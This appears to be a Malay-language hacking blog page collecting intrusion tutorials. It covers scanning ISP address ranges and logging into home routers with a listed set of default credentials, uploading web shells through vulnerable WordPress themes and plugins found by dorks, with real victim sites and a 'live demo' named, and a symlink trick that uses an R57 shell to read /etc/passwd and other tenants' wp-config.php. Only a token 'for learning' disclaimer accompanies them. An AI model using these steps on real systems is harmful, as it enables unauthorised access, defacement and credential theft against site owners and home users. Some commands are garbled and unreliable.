Showing posts with label TUTORIAL HACK. Show all posts
Showing posts with label TUTORIAL HACK. Show all posts

Home » Posts filed under TUTORIAL HACK

Cara hack account streamyx

Assalamualikum,selamat tengah hari dan selamat hari raya kepada semua pembaca :)
Hari ini saya akan menunjuk kan anda cara-cara untuk hack acc streamyx :)




Download

1.Buka Blues port scanner
2.Kemudian masuk kan ip "218.111.10.0" dalam kotak start dan masuk kan nilai yg anda mahu pada kotak end.contoh: "218.111.10.100"


3.Click pada "show list " kemudian tick kan pada nombor-nombor berikut --> 21 , 23 , 53 , 80 , 8080 .


4.Click start scan ,tunggu sampai habis scan.Setelah habis scan,right click pada kotak result dan click pada save result.Save kat desktop :)
5.Padam Blues port scanner dan pergi ke desktop da buka result yg anda save di desktop td.
6.Anda perlu cuba satu-persatu ip tersebut.
7.Contoh ip --> 218.111.10.96 .Paste ip tersebut pd broswer anda :)
8.Setelah anda paste kan ip tersebut di browser andalogin page seperti gmbar di bawah akan terpapar.maknanya anda hampir berjaya :)


9.Bergantung pada login page yg keluar,kadang2 login page lain yg kuar.klau login page lain yg kuar,tgok pada jenis router.
Ni sye ada sertakan defult user:pass router2 yg lain.

ZTE modem
IP Address: 192.168.1.1

Username: ADSL
Password: expert03

Username: ZXDSL
Password: ZXDSL

Username: admin
Password: telekomst

KASDA modem:
IP Address: 192.168.1.1

Username: admin
Password: telekomst

ArtNet modem:
IP Address: 192.168.1.1

Username: admin
Password: telekomst

Username: admin
Password: admin

Username: admin
Password: password

Triz modem:
IP Address: 192.168.1.1

Username: admin
Password: aaaaaaaa

Aztech modem:
IP Address: 10.0.0.2 OR 192.168.1.1

Username: admin
Password: blank

Username: admin
Password: password

Username: admin
Password: admin

Billion modem:
IP Address: 192.168.1.254

Username: admin
Password: password

Huawei modem:
IP Address: 192.168.1.1

Username: admin
Password: admin

Hyundai HSE-220 Modem:
IP Address: 192.168.1.1
Username: ADSL
Password: ADSL

Username: admin
Password: ADSL

Username: root
Password: root

Riger DB102:
IP Address: 192.168.1.1

Username: tmadmin
Password: tmadmin

TP-LINK MODEM / ADSL2 / ROUTER:
IP Address: 192.168.1.1

Username: admin
Password: admin

Untuk tutorial ini,admin hack pass router model TM6841G.

10.Setelah anda masuk pada login page yg td,click pada congfiguration.


11.Paparan baru akan keluar,user:pass da terpapar.Tetapi,password nye ditunjukkan dlam bentuk asterisk.
12.Senang saja,anda perlu tgok pada source code page tersebut .ctrl + u , kemudian ctrl + f .find password.


13.Setelah anda da menjumpai line tersebut.perhatikan value.value tersebut ialah password kpd user tadi.Senang je kan.?

14.Gunakan tutorial ini untuk tujuan pembelajaran,jikalau anda tidak faham tutorial ini anda boleh download video untuk tutorial ini :)
Tutorial video <--download di sini

AMARAN KERAS : GUNAKAN TUTORIAL INI UNTUK TUJUAN PEMBELAJARAN.PIHAK KAMI TIDAK AKAN BERTANGGUNGJAWAB KEATAS APA YANG BERLAKU.!!

AJAX FILE MANAGER REMOTE CODE EXECUTION

Assalamualaikum semua nak share tutorial ajaxfilemanager ni hahaha

ok korang boleh tengok vedio ku sediakan di bawah enjoy ya!!



DNS HIJACKING TUTORIAL VEDIO

Assalamualaikum nak share sikit cara2 hack website guna DNS hijacking tutorial dari haxarwow

ok korang leh tengok vedio kat bawah

selamat mencuba

Enjoy!!

WordPress "photocrati-theme" Remote File Upload "RFU"

As-salam salam sejahteranye pun aduii...

ok hari ni ku nak ajar exploit wordpress sangat simple upload shell dah terus boleh hack ok jom mulakannya pun aduiii...

Dork nya :-

"inurl:wp-content/themes/photocrati-theme/admin"

ok kembang2 kan la dork nya yach << indon -_-

ok seterusnya

 korang akan jumpa website macam ini

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F

seterusnya korang cuma perlu ganti dengan  upload_edit.php


contohnya macam ini

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php


maka akan terpapar tempat nak upload shell macam nie

 
click bagi besarkan gmbar

ok lepas 2 korang bolehlah upload shell berbentuk shell.php.jpg


ramai tnya mana nak dapat shell.php.jpg ?? korang cuma perlu rename nama shell korang saje jadi shell.php.jpg

dah korang upload tekan menekan add images

ok dah selesai upload shell korang akan kuar di sini

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg

contoh shell yang aku dah upload

http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg

so enjoy!! 








EXPLOIT WP PLUGIN "TO-DO-MINIFORM"

Salam semua ku nak share sikit method ku jumpa tadi x tau la method nie dah lama orang guna ke :p

ok jom mula :D


[ dork ]


inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload


kembang2 kan lah dork ye!

ok jadi cari website dengan dork 2 korang akan jumpa form macam nie


ok dah jumpa korang upload shell bentuk shell.php.jpg

shell korang akan kuar dekat sini

site.com/wp-content/uploads/tdomf/tmp/1/ip address korang/shell.php.jpg

korang leh check ip address korang kt http://whatismyip.com

ok ni contoh site yg aku dapat

http://warszawiacy.info.pl/
http://zone-h.org/mirror/id/19744230


korang leh cuba sendri

Live demo

http://solpowerhawaii.com/main/wp-content/plugins/0.13.9/tdomf-upload-inline.php?tdomf_form_id=1&index=


CARA HACK WEBSITE METHOD CSRF

As-salam korang semua harap2 baik2 saja
dah lama x update blog nie

ok hari ni ku nak ajar korang cara hack website dengan method CSRF ?

apa 2 CSRF??

CSRF ialah cross site scripting

haha betul x aku xtau ok jom mula :D


dork : inurl:/plugins/simple-forum/

tambah

/resources/jscript/ajaxupload/sf-uploader.php

kt belakang contoh akan jadi cmni

www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

dia akan kuar tulisan = error

kalau kuar acces denied x boleh la 2

poc dia 



<form enctype="multipart/form-data" 
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


upload poc dia dalam mana web save as.html

lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell

shell korang akan kuar kt sini

wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php

ok Enjoy!!

Cari admin page menggunakan perl script

Assalamualaikum dan selamat tengah hari , setelah sekian lama admin tak update blog ni sbb bz sikit . k , dalam tutorial kali ini admin aku berkongsi dengan anda bagai mana untuk mencari admin page menggunakan perl script .



Sebelum itu , anda perlu install perl di dalam komputer anda untuk anda run perl script tersebut .
Tutorial install perl disini :)

Download perl script disini

k , setelah anda download perl script tu extract .rar dan letak kan " login.pl " di dalam local disk (c:) anda .

Buka cmd dan jalan kan perintah teserbut :-


C:\Users\g0sh4wk>cd\

C:\>perl login.pl


Letakan link site yg anda hendak cari admin page nya :) 

contoh : http://getweeklypaychecks.com/ jangan lupa letakakn " / " di akhir link dan takan enter . tunggu seketika . 


Jika admin page nya telah dijumpai , paparan akan seperti berikut .


Selamat mencuba :P

Cara nak decrypt password md5 NEWBIE!

As-salam ku nak suggest kat korang cara untuk decrypt password md5.

ok jom mula

ni dia website yang sering digunakan untuk decrypt password md5,sha1 atau sebagainya

http://www.md5decrypter.co.uk/

korang boleh pegi kat situ dah decypt password korang nak hehehe ni tutorial bagi yg baru main hash2 nie :p

ok salam

CARA UPLOAD SHELL GUNA TAMPER DATA [VIDEO]

Salam sejahtera semua

Hari ni ku ajar korang cara deface mengunakan tamper data .

Sebenarnya tamper data ini mudah dipelajari dan mudah di fahami . oleh kerana tutorial jenis bergambar kurang difahami jadi saya telah buat tutorial jenis video kepada semua pembaca pembaca blog saya .

http://tamperdata.mozdev.org/images/tamperdata.jpg


Ok. untuk berlajar cara mengunakan tamper data korang kena ada shell . apa itu shell ? korang google ok .

Kita akan rename shell kita ke "*/.php.jpg"

ikut kesesuaian website tersebut adakah dia akan menerima upload file jenis */gif ./ .txt ./ png ./ dan lain lain .

Contoh shell yang akan saya gunakan adalah "shell.php.jpg"

ada "jpg" di belakang shell tersebut

Ok . kalau korang nak yang lebih faham korang berlajar daripada video yang seth buat ni k.



TUTORIAL BYPASS SERVER SYMLINK

salam
lama dah tak update blog . jadi sekarang saya akan ajar korang cara bypassing server mengunakan keadah symlink . ok . ikut tutorial dia ok . banyak step . ikut satu persatu .

 ok .. pertama korang kena ada shell yang sudah diuploadkan kedalam satu pelayan . ok. jadi shell yang saya gunakan adalah R57 shell sebab senang untuk bypass dir dan senang untuk menjalankan command .

 ini shell yang saya gunakan .

kedua:di dalam RUN command taipkan command yang berbunyi :

 :cat /etc /passwd

 macam dalam gambar dekat bawah ni .
ok . selepas itu akan keluar list yang banyak macam dalam gambar dekat bawah ni .
yang akan di listkan adalah seperti root / username / dir / dan banyak lagi . ok . yang seterusnya adalah make dir

 cari dir ;images di dalam server itu lepas itu buat satu lagi folder dengan nama khan

 open shell di tab yang baru selepas itu jalankan command yang berbunyi :

 :mkdir khan

 selepas itu masuk kedalam folder khan

 ok.. cari username yang di listkan di dalam list command . cari domain slah satu dari pada domain yang ada tersenarai dalam server itu . guna ip server yang ada shell r57 untuk mencari website yang sama dalam local host .

 yang number satu adalah ip website dan yang kedua adalah domain website yang ada tersenarai dalam shell r57

 saya akan ambil website yang ada anak panah yang number 2 .

 ok .

 sekarang copy link website tersebut . redhotcellphone

 dan ctrl+f di dalam shell dan paste .

ok .. sekarang run command yang berbunyi

 :In -s/home/redhotce/public_html/ redhotcel

 selepas itu . pergi ke shell itu balik . sekarang korang buka shell yang baru dengan open new tab . shell yang korang buka itu mesti directory yang mula mula sekali korang lakukan tadi .

 selepas itu taip command yang berbunyi

:touch .htaccess

 selepas itu tekan enter

 di dalam kotak merah itu taip pula command yang berbunyi

 :khan/.htaccess

 selepas folder yang di buat tadi . folder tadi nama dia khan . jadi dekat hujung khan . di dalam kotak yang bertajuk 'file to edit'

 :khan/.htaccess

 selepas itu tekan Edit files. selepas itu akan keluar satu kotak . masukan word ini

 'option indexes followsymlink
DirectoryIndex khan.htm
AddType txt .php
AddHandler txt .php'

 buang simbol '

 oke ,.

 selepas itu tekan save .

 selepas itu akan keluar macam biasa . ok ..
sekarang korang run lagi command yang berbunyi

 :Is -la

 dan enter .

 copy domain tersebut dan paste dekat url bar . maka akan keluar directory macam ni
di dalam directory khan yang kita buat . ada satu file name yang bernama

 :redhotcel

 yahoo . korang dah jumpa public_html .. korang boleh download config file..

 korang click folder yang bernama redhotcel tu . di dalam kotak macam gambar di atas

 akan keluar directory untuk redhotcel

 ok... sekarang balik kepada shell tadi

 taip command yang berbunyi

 :In -s/home/redhotcel/public_html/wp-config.php config.txt

 macam gambar dekat bawah ni =-
korang boleh juga mengunakan command yang berbunyi

 :In -s/home/redhotcel/public_html/wp-configuration.php configuration.txt

 selepas itu tekan enter =-

 selepas korang tekan enter . korang run lagi command yang berbunyi

 :Is -la

 maka akan keluar


selepas itu korang buka balik dir khan tadi . maka akan keluar config.txt
korang kilk config.txt tersebut dan boom.!
\
db username :alalala'
db password:lalala'

 ok ..sekarang sudah selesai . sebenarnya symlink ada satu php untuk ambil e-mail dan tukar kepada email korang ..

 ok. ini tutorial part 1 .. tunggu tutorial part dua

 menuakar password mengunakan forget password enjoy ..

 r57 shell source code here

 p/s: endahkan simbol : dan '